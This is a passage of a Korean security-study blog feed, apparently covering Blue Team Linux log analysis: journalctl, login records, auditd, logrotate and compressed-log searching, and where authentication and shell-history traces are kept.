&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt; 3. 시스템 부팅 및 오류 세션 분석 &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -b&lt;/b&gt;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 현제 부팅 세션의 전체 로그 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -b -1`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 재부팅 직전 시점의 로그 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -p err -n 50&lt;/b&gt;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 가장 최근 발생한 에러(err) 등급 이상의 로그 50줄 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-5] wtmp / btmp / utmp&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 리눅스는 텍스트 로그 (auth.log, secure)와 별개로, 로그인 세션 정보를&lt;b&gt; Binary 형식&lt;/b&gt;으로 별도 저장함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;wtmp&lt;/b&gt; ( &lt;b&gt;last&lt;/b&gt; 명령어 )&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 시스템의 모든 로그인 및 로그아웃 전체 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;btmp&lt;/b&gt; ( &lt;b&gt;lastb&lt;/b&gt; 명령어 )&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 실패한 로그인 시도만 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;utmp / who&lt;/b&gt; ( &lt;b&gt;w&lt;/b&gt; 명령어 )&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 지금 현재 시스템에 로그인해 있는 현재 세션 정보 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-6] auditd / audit.log&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;auditd 장점&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 실행 명령 및 인자 전체 기록 (type=EXECVE)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&amp;rarr;&lt;span&gt; 실행된 프로그램뿐만 아니라, 실행 시 입력한 옵션과 인자 값까지 모두 보여줌&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- 파일 무결성 추적 (type=PATH)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&amp;rarr; 특정 민감 파일 (.ssh/authorized_keys, /etc/shadow...)에 누가 접근했는지, 생성/수정/삭제 여부를 실시간 추적&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- 실제 사용자 식별 (auid)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&amp;rarr;&lt;span&gt; 공격자가 sudo를 통해 root 권한으로 활동해도 최초 접속 시의 사용자 ID (Audit User ID)를 끝까지 추적&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- 커널 수준 수집 (type=SYSCALL)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&amp;rarr;&lt;span&gt; Shell 레벨을 넘어서는 시스템 콜 (syscall) 단위의 기록 제공 &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 로그 신뢰도 매우 높음&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;주의사항&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;b&gt;- 설정의 중요성:&lt;/b&gt; 기본 설정만으로는 수집 범위가 제한적 &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 보안 규칙 (audit.rules) 설정 필요&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;b&gt;- 데이터 폭증:&lt;/b&gt; 너무 세밀히 설정 시 로그 양이 너무 많음 &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 시스템 성능에 악영향&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;b&gt;- 복잡한 형식:&lt;/b&gt; 로그가 사람이 읽기엔 복잡 &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 전문적인 파싱 도구나 SIEM 솔루션을 통한 시각화 필요&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-7] logrotate와 압축 로그&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 리눅스는 &lt;b&gt;logrotate&lt;/b&gt; 도구를 통해 로그 파일을 주기적으로 관리함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ &lt;b&gt;auth.log&lt;/b&gt; = 현재 기록되고 있는 활성 로그 파일&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+&lt;b&gt; auth.log.1&lt;/b&gt; = 어제 기록되었던 로그가 백업된 상태 (압축 전)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ &lt;b&gt;auth.log.2.gz&lt;/b&gt; = 2일 전 기록된 백업 로그가 압축된 상태 (용량 절감)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ &lt;b&gt;auth.log.3.gz&lt;/b&gt; = 3일 전 기록된 백업 로그가 압축된 상태 (용량 절감)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ RHEL 계열은 `&lt;b&gt;secure-20260420&lt;/b&gt;` 같이 날짜 기반 이름 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;압축 로그 전용 조회 명령어 (Z-Commands)&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- &lt;span style=&quot;color: #5733b1;&quot;&gt;zgrep&lt;/span&gt; (= grep) :&lt;/b&gt; 압축된 로그 내 특정 키워드 (IP, 계정 등) 검색&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- &lt;span style=&quot;color: #5733b1;&quot;&gt;zless&lt;/span&gt; (= less) :&lt;/b&gt; 압축 파일 내용을 페이지 단위로 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- &lt;span style=&quot;color: #5733b1;&quot;&gt;zcat&lt;/span&gt; (= cat) :&lt;/b&gt; 압축 파일 전체 내용 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- &lt;span style=&quot;color: #5733b1;&quot;&gt;zdiff&lt;/span&gt; (= diff) :&lt;/b&gt; 압축된 두 로그 파일 간의 차이점 비교&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-8] 리눅스 로그 조회 워크플로우&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. 현재 보기 ( &lt;span style=&quot;color: #5733b1;&quot;&gt;tail -f&lt;/span&gt; )&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 실시간으로 발생 중인 최신 로그 동향 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; brute force 공격이나 시스템에러를 실시간 모니터링&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. 문맥 보기 ( &lt;span style=&quot;color: #5733b1;&quot;&gt;less&lt;/span&gt; )&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 로그 파일 전체를 보며 흐름 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 특정 이벤트 발생 전후의 사용자 행위를 파악해 공격의 맥락 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. 필터링 ( &lt;span style=&quot;color: #5733b1;&quot;&gt;grep &lt;/span&gt;)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 특정 키워드(IP, 사용자명, 파일명 등)가 포함된 라인만 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 알려진 IOC(침해 지표)가 시스템 내에 있는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. 패턴 요약 ( &lt;span style=&quot;color: #5733b1;&quot;&gt;awk, sort, uniq&lt;/span&gt; )&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 대량의 로그 데이터를 가공해 빈도 집계 및 이상 패턴 발견&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 공격의 규모와 대상을 수치화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. 과거 확장 ( &lt;span style=&quot;color: #5733b1;&quot;&gt;zgrep&lt;/span&gt; )&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 압축된 과거의 로그 파일들 검색&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 예전에 발생했을지 모를 초기 침투 흔적 추적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.7&amp;nbsp;-&amp;nbsp;Linux&amp;nbsp;로그&amp;nbsp;구조&amp;nbsp;및&amp;nbsp;파일&amp;nbsp;체계.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;</description>
      <category>Blue Team (SOC)/Linux Log Analysis</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>IR</category>
      <category>linux</category>
      <category>log</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/69</guid>
      <comments>https://anbymata.tistory.com/69#entry69comment</comments>
      <pubDate>Mon, 20 Apr 2026 22:00:17 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.6 - Linux 로그 기초</title>
      <link>https://anbymata.tistory.com/68</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-1] Linux의 주요 관찰 행위 유형&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Auth &amp;amp; System&lt;/b&gt; (인증 및 권한)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 사용자 로그인/로그아웃&lt;/b&gt; - SSH 접속이나 Console을 통한 접근 기록 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 권한 상승&lt;/b&gt; - sudo나 su 명령을 통해 일반 사용자의 관리자 권한 획득 시도 감지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Process &amp;amp; System&lt;/b&gt; (프로세스 및 서비스)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 명령 실행&lt;/b&gt; - 사용자가 입력한 Shell 명령어, cron&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(예약된 작업)&lt;/span&gt;, systemd&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(시스템 서비스)&lt;/span&gt;의 실행 상태 추적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 서비스 제어&lt;/b&gt; - 특정 서비스의 시작, 중지, 변경 이력 관찰&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;File &amp;amp; Network&lt;/b&gt; (파일 및 네트워크)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 파일 시스템 변화&lt;/b&gt; - 중요한 설정 파일이나 데이터의 생성, 수정, 삭제 행위 모니터링&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 네트워크 연결&lt;/b&gt; - Outbound&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(외부로 나가는 통신)&lt;/span&gt;과 Inbound&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(들어오는 접속)&lt;/span&gt;을 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Audit&lt;/b&gt; (감사)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 위의 행위들을 정밀하게 기록하는 Audit 시스템을 통해 세부 증거 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-2] 로그 기록의 생성 과정&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1.&amp;nbsp;사용자 입력&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 관리자가 `sh admin@host` 같은 명령으로 접속 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. sshd (서비스)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- SSH 데몬이 연결 요청을 수신하고 수락 여부 결정&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;3. PAM (인증 모듈)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 계정 정책과 비밀번호를 검증해 실제 로그인 허용 여부 판단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. Shell 생성&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 인증 완료 시 사용자가 명령을 내릴 수 있는 Shell (session)이 열림&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. 명령 실행 (sudo...)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 사용자의 권한 상승이나 특정 명령은 추가적인 흔적이 남음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;6. 최종 기록&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 이 모든 과정은 auth.log 나 secure 파일에 기록되어 SIEM에 수집됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;확인해야 할 주요 흔적들&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;auth.log&lt;/b&gt; - 인증의 성공과 실패 여부 확인하는 1순위 데이터&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;syslog&lt;/b&gt; - 시스템 전반의 운영 및 세션 정보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;wtmp&lt;/b&gt; - 사용자의 로그인 및 로그아웃 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;auditd&lt;/b&gt; - 리눅스 커널 수준에서 발생하는 파일 접근, 시스템 호출 등의 상세 행위 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-3] 데이터 소스별 특징&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;System Log (auth.log, syslog)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;생성 주체:&lt;/span&gt; OS / 서비스&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 위치:&lt;/span&gt;&lt;b&gt; /var/log/*&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조작 가능성:&lt;/span&gt; 중간 (root로 삭제 가능)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;신뢰 수준:&lt;/span&gt; 높음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;주요 활용:&lt;/span&gt; auth.log로 인증, 시스템 이벤트 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Journal (systemd-journald)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;생성 주체:&lt;/span&gt; systemd&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 위치:&lt;/span&gt; &lt;b&gt;/run/log/journal&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조작 가능성:&lt;/span&gt; 중간&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;신뢰 수준:&lt;/span&gt; 높음&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;주요 활용:&lt;/span&gt; 서비스 단위 추적 및 빠른 로그 조회&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Shell History&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;생성 주체:&lt;/span&gt; 사용자 Shell&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 위치:&lt;/span&gt;&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;~/.bash_history&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조작 가능성:&lt;/span&gt; 높음 (삭제/우회 쉬움)&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;신뢰 수준:&lt;/span&gt; 낮음~중간&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;주요 활용:&lt;/span&gt; 분석의 보조 단서로만 활용&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
